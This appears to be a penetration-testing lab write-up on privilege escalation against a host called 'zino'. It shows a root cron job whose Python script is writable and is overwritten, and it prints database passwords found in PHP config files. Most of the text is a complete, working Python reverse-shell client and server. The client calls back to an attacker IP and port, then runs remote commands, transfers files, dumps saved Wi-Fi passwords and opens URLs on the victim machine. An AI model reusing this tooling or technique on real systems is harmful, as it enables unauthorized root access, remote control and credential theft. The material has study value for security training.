Priv Escalation

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

*/3 *   * * *   root    python /var/www/html/booked/cleanup.py

Cron job running as root.

╔══════════╣ Searching passwords in config PHP files
$conf['settings']['database']['password'] = 'password';
$conf['settings']['password']['minimum.letters'] = '6';
$conf['settings']['password']['minimum.numbers'] = '0';
$conf['settings']['password']['upper.and.lower'] = 'false';
$conf['settings']['database']['password'] = 'RoachSmallDudgeon368';
$conf['settings']['password']['minimum.letters'] = '6';
$conf['settings']['password']['minimum.numbers'] = '0';
$conf['settings']['password']['upper.and.lower'] = 'false';

I can edit the cronjob.

www-data@zino:/var/www/html/booked$ echo "lol" >>cleanup.py 
www-data@zino:/var/www/html/booked$ cat cleanup.py 
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /var/www/html/booked/uploads/reservation/* ')
except:
        print 'ERROR...'
sys.exit(0)
lol

Replaced the python file with a python3 reverse shell.

www-data@zino:/tmp$ cat client.py > /var/www/html/booked/cleanup.py

This is the client.py that I transferred, I do this with every python file that I can replace.

#!/usr/bin/python
# -*- coding: utf-8 -*-
##############################
#   **python reverse shell**
# coded by: oseid Aldary
##############################
#Client_FILE
import struct,socket,subprocess,os,platform,webbrowser as browser
# server_config
IP = "192.168.49.100" # Your server IP, default: localhost
port = 8003 # #Your server Port, default: 4444
################
class senrev:
    def __init__(self,sock):
        self.sock = sock
    def send(self, data):
        pkt = struct.pack('>I', len(data)) + data
        self.sock.sendall(pkt)
    def recv(self):
        pktlen = self.recvall(4)
        if not pktlen: return ""
        pktlen = struct.unpack('>I', pktlen)[0]
        return self.recvall(pktlen)
    def recvall(self, n):
        packet = b''
        while len(packet) < n:
            frame = self.sock.recv(n - len(packet))
            if not frame:return None
            packet += frame
        return packet

def cnet():
  try:
    ip = socket.gethostbyname("www.google.com")
    con = socket.create_connection((ip,80), 2)
    return True
  except socket.error: pass
  return False
def runCMD(cmd):
       runcmd = subprocess.Popen(cmd,
                                 shell=True,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE,
                                 stdin=subprocess.PIPE)
       return runcmd.stdout.read() + runcmd.stderr.read()

def upload(cmd):
   filetosend = "".join(cmd.split(":download")).strip()
   if not os.path.isfile(filetosend): controler.send("error: open: '{}': No such file on clinet machine !\n".format(filetosend).encode("UTF-8"))
   else:
       controler.send(b"true")
       with open(filetosend, "rb") as wf:
        for data in iter(lambda: wf.read(4100), b""):
         try:controler.send(data)
         except(KeyboardInterrupt,EOFError):
          wf.close()
          controler.send(b":Aborted:")
          return
       controler.send(b":DONE:")

def wifishow():
  try:
    if platform.system() == "Windows": info = runCMD("netsh wlan show profile name=* key=clear")
    elif platform.system() == "Linux": info = runCMD("egrep -h -s -A 9 --color -T 'ssid=' /etc/NetworkManager/system-connections/*")
    else: info = b":osnot:"
  except Exception: info = b":osnot:"
  finally: controler.send(info)
def download(cmd):
     filetodown = "".join(cmd.split(":upload")).strip()
     filetodown = filetodown.split("/")[-1] if "/" in filetodown else filetodown.split("\\")[-1] if "\\" in filetodown else filetodown
     wf = open(filetodown, "wb")
     while True:
      data = controler.recv()
      if data == b":DONE:":break
      elif data == b":Aborted:":
        wf.close()
        os.remove(filetodown)
        return
      wf.write(data)
     wf.close()
     controler.send(str(os.getcwd()+os.sep+filetodown).encode("UTF-8"))
def browse(cmd):
    url = "".join(cmd.split(":browse")).strip()
    browser.open(url)
def shell(senrev=senrev):
   global s
   global controler
   mainDIR = os.getcwd()
   tmpdir=""
   controler = senrev(s)
   while True:
     cmd = controler.recv()
     if cmd.strip():
       cmd = cmd.decode("UTF-8",'ignore').strip()
       if ":download" in cmd:upload(cmd)
       elif ":upload" in cmd:download(cmd)
       elif cmd == ":kill":
          s.shutdown(2)
          s.close()
          break
       elif ":browse" in cmd: browse(cmd)
       elif cmd == ":check_internet_connection":
          if cnet() == True: controler.send(b"UP")
          else: controler.send(b"Down")
       elif cmd == ":wifi": wifishow()
       elif "cd" in cmd:
               dirc = "".join(cmd.split("cd")).strip()
               if not dirc.strip() : controler.send("{}\n".format(os.getcwd()).encode("UTF-8"))
               elif dirc == "-": 
                 if not tmpdir: controler.send(b"error: cd: old [PAWD] not set yet !\n")
                 else:
                   tmpdir2 = os.getcwd()
                   os.chdir(tmpdir)
                   controler.send("Back to dir[ {}/ ]\n".format(tmpdir).encode("UTF-8"))
                   tmpdir = tmpdir2
               elif dirc =="--":
                  tmpdir = os.getcwd()
                  os.chdir(mainDIR)
                  controler.send("Back to first dir[ {}/ ]\n".format(mainDIR).encode("UTF-8"))
               else:
                 if not os.path.isdir(dirc): controler.send("error: cd: '{}': No such file or directory on clinet machine !\n".format(dirc).encode("UTF-8"))
                 else:
                     tmpdir = os.getcwd()
                     os.chdir(dirc)
                     controler.send("Changed to dir[ {}/ ]\n".format(dirc).encode("UTF-8"))
       elif cmd == "pwd": controler.send(str(os.getcwd()+"\n").encode("UTF-8"))
       else:
               cmd_output = runCMD(cmd)
               controler.send(bytes(cmd_output))
   exit(1)
try:
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((IP, port))
  shell()
except Exception: exit(1)

This is the server.

#!/usr/bin/python
# -*- coding: utf-8 -*-

##############################
#   **python reverse shell**
# coded by: oseid Aldary
##############################
#Server_File

import socket,struct,sys,os;from datetime import datetime
try: input = raw_input
except NameError: input = input

class senrev:
    def __init__(self,sock):
        self.sock = sock
    def send(self, data):
        pkt = struct.pack('>I', len(data)) + data
        self.sock.sendall(pkt)
    def recv(self):
        pktlen = self.recvall(4)
        if not pktlen: return ""
        pktlen = struct.unpack('>I', pktlen)[0]
        return self.recvall(pktlen)
    def recvall(self, n):
        packet = b''
        while len(packet) < n:
            frame = self.sock.recv(n - len(packet))
            if not frame:return None
            packet += frame
        return packet

def help():
   print("""
Commands      Desscription
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:help         Show this help message
:download     Download file from client machine
:upload       Upload file to client machine
:kill         Kill the connection with client machine
:exec         Run external command
:check        Check if client machine is connected to internet
:wifi         Show Client machine wifi info [names,passwod,etc]
:browse       Open an website on client machine browser
pwd           Print working directory in client machine
cd -          Switch back to previous directory in client machine
cd --         Switch back to first directory when connection was established with client machine
""")
def download(filee):
  cmd = filee
  filee = "".join(filee.split(":download")).strip()
  if filee.strip():
   filetodown = filee.split("/")[-1] if "/" in filee else filee.split("\\")[-1] if "\\" in filee else filee
   controler.send(cmd.encode("UTF-8"))
   down = controler.recv().decode("UTF-8",'ignore')
   if down == "true":
     print("[~] Downloading [ {} ]...".format(filetodown))
     wf = open(filetodown, "wb")
     while True:
      data = controler.recv()
      if data == b":DONE:": break
      elif data == b":Aborted:":
        wf.close()
        os.remove(filetodown)
        print("[!] Downloading Has Aborted By Client!")
        return
      wf.write(data)
     wf.close()
     print("[*] Download Complete :)\n[*] file Saved In : {}\n".format(os.getcwd()+os.sep+filetodown))
   else: print(down)
  else: print("Usage: :download <file_to_download_from_client_machine>\n")
def upload(cmd):
    filetoup = "".join(cmd.split(":upload")).strip()
    if not filetoup.strip(): print("usage: :upload <file_to_upload>\n")
    else:
       if not os.path.isfile(filetoup): print("error: open: no such file: "+filetoup+"\n")
       else:
          controler.send(cmd.encode("UTF-8"))
          print("[~] Uploading [ {} ]...".format(filetoup))
          with open(filetoup,"rb") as wf:
            for data in iter(lambda: wf.read(4100), b""):
              try:controler.send(data)
              except(KeyboardInterrupt,EOFError):
                wf.close()
                controler.send(b":Aborted:")
                print("[!] Uploading Has Been Aborted By User!\n")
                return
          controler.send(b":DONE:")
          savedpath = controler.recv().decode("UTF-8")
          print("[*] Upload Complete :)\n[*] File uploaded in : "+str(savedpath).strip()+" in client machine\n")

def check_con():
     print("[~] Checking....")
     controler.send(b":check_internet_connection")
     status = controler.recv().decode("UTF-8").strip()
     if status == "UP": print("[*] client: Connected to internet !\n")
     else: print("[!] client: Not Connected to internet !\n")

def browse(cmd):
  url = "".join(cmd.split(":browse")).strip()
  if not url.strip(): print("Usage: :browse <Websute_URL>\n")
  else:
    if not url.startswith(("http://","https://")): url = "http://"+url
    print("[~] Opening [ {} ]...".format(url))
    controler.send(":browse {}".format(url).encode("UTF-8"))
    print("[*] Done \n")

def control():
    try:
      cmd = str(input("[{}]:~# ".format(a[0])))
      while not cmd.strip(): cmd = str(input("[{}]:~# ".format(a[0])))
      if cmd == ":help":
            help()
            control()
      elif ":download" in cmd:
            download(cmd)
            control()
      elif ":upload" in cmd:
           upload(cmd)
           control()
      elif cmd ==":kill":
         print("[!] Connection has been killed!")
         controler.send(b":kill")
         c.shutdown(2)
         c.close()
         s.close()
         exit(1)
      elif ":exec" in cmd:
           cmd = "".join(cmd.split(":exec")).strip()
           if not cmd.strip(): print("Usage: :exec <command>\n")
           else:
               print("[*] exec:")
               os.system(cmd)
               print(" ")
           control()
      elif cmd == ":check":
        check_con()
        control()
      elif cmd == ":wifi":
        print("[*] Geting Wifi profiles info...")
        controler.send(b":wifi")
        info = controler.recv()
        try:
          info = info.decode("UTF-8","ignore")
        except  UnicodeEncodeError: info = info
        finally:
           if info==":osnot:": print("[!] Sorry, i can't found wifi info of client machine!\n")
           else:
             print("[*] INFO:\n")
             print(info + "\n")
             control()
      elif ":browse" in cmd:
        browse(cmd)
        control()
      elif cmd.lower() == "cls" or cmd == "clear":
             os.system("cls||clear")
             control()
      controler.send(cmd.encode("UTF-8"))
      DATA = controler.recv()
      if DATA.strip(): print(DATA.decode("UTF-8",'ignore'))
      control()
    except (KeyboardInterrupt, EOFError):
           print(" ")
           control()
    except socket.error:
       print("[!] Connection Lost to: "+a[0]+" !")
       c.close()
       s.close()
       exit(1)
    except UnicodeEncodeError:
        print(DATA)
        print(" ")
        control()
    except Exception as e:
       print("[!] An error occurred: "+str(e)+"\n")
       control()

def server(IP,PORT,senrev=senrev):
  global s
  global c
  global a
  global controler
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  s.bind((IP,PORT))
  s.listen(1)
  print("[*] Server started on > {}:{} < | at [{}]".format(IP,PORT,datetime.now().strftime("%H:%M:%S")))
  try:
    c,a = s.accept()
    controler = senrev(c)
    print("\n[*] Connection From {}:{}".format(a[0],a[1]))
    print("[*] type ':help' to show help message\n")
    control()
  except (KeyboardInterrupt,EOFError):
         print(" ")
         exit(1)
if len(sys.argv) !=3:
        print("Usage: python server.py <IP> <PORT>")
        exit(1)
server(sys.argv[1],int(sys.argv[2]))